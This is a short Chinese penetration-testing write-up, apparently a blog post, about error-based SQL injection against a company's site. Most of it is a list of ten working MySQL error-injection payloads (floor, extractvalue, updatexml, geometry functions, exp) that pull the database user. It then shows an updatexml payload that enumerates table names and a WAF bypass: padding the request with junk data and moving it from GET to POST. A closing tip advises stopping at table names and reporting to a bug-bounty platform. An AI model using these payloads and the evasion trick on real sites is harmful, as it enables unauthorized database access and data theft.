對某個企業進行滲透測試
發現有報錯注入
拓展一下10種報錯注入的方式
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
我們選擇update報錯注入
查看錶
updatexml(1,concat(0x7e,(SELECT group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)-- -
被攔截,想想怎麼繞過
後來想到加垃圾數據
加入下面生成的垃圾數據,但是414了,get傳不了這麼長的數據
生成的垃圾數據
抓包
GET改成POST
注入數據放在後面
send
獲取到表名
小貼士
對網站做滲透測試,不要拿數據,能證明有sql注入洞,並且有危害就行了,所以大家做測試的時候拿到表名就可以交補天了
